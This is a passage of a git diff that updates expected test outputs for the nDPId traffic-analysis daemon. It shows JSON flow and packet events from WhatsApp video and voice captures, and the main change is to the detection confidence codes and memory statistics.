{"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1561455795276,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1561455795276,"pkt":"AQBef\/\/6kLkxKPrKCABFAACgOnoAAAIRyyTAqAIM7\/\/\/+skCB2wAjBoITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"} 
00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1561455795277,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1561455795277,"pkt":"AQBef\/\/6kLkxKPrKCABFAACg4VAAAAIRJE7AqAIM7\/\/\/+v4BB2wAjOUITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455770313,"flow_last_seen":1561455779337,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455772049,"flow_last_seen":1561455780246,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455769791,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792273,"flow_last_seen":1561455795276,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":200000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":340,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":493,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":1139,"flow_tot_l4_payload_len":227969,"flow_avg_l4_payload_len":462,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792270,"flow_last_seen":1561455795277,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":893,"flow_first_seen":1561455781352,"flow_last_seen":1561455792065,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1293,"flow_tot_l4_payload_len":647331,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455770313,"flow_last_seen":1561455779337,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455772049,"flow_last_seen":1561455780246,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455769791,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792273,"flow_last_seen":1561455795276,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":200000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":340,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":493,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":1139,"flow_tot_l4_payload_len":227969,"flow_avg_l4_payload_len":462,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792270,"flow_last_seen":1561455795277,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":893,"flow_first_seen":1561455781352,"flow_last_seen":1561455792065,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1293,"flow_tot_l4_payload_len":647331,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1561455767339,"flow_last_seen":1561455795283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1561455781247,"flow_last_seen":1561455791996,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":792,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1561455781247,"flow_last_seen":1561455791996,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":792,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","packets-captured":1567,"packets-processed":1567,"total-skipped-flows":0,"total-l4-payload-len":891931,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":14,"total-idle-flows":14,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":82,"global_ts_msec":1561455795283} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1567/1567 @@ -88,9 +88,9 @@ ~~ total active/idle flows...: 14/14 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5991413 bytes -~~ total memory freed........: 5991413 bytes -~~ total allocations/frees...: 119744/119744 +~~ total memory allocated....: 6072388 bytes +~~ total memory freed........: 6072388 bytes +~~ total allocations/frees...: 122492/122492 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2365 chars diff --git a/test/results/wa_voice.pcap.out b/test/results/wa_voice.pcap.out index 8b8b9553b..d1f4d15f8 100644 --- a/test/results/wa_voice.pcap.out +++ b/test/results/wa_voice.pcap.out 
@@ -2,80 +2,80 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1561455687942} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687942,"flow_last_seen":1561455687942,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687942,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561455687942,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455687942,"pkt":"xiwDYGpkkLkxKPrKCABFAAA8VCwAAP8R4ibAqAIMwKgCAcjnADUAKL4MZG8BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} 
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687942,"flow_last_seen":1561455687942,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687942,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687942,"flow_last_seen":1561455687942,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687942,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1561455687944,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1561455687944,"pkt":"kLkxKPrKxiwDYGpkCABFAABMq4sAAEARSbjAqAIBwKgCDAA1yOcAOH0WZG+BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} -00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1561455687944,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1561455687944,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
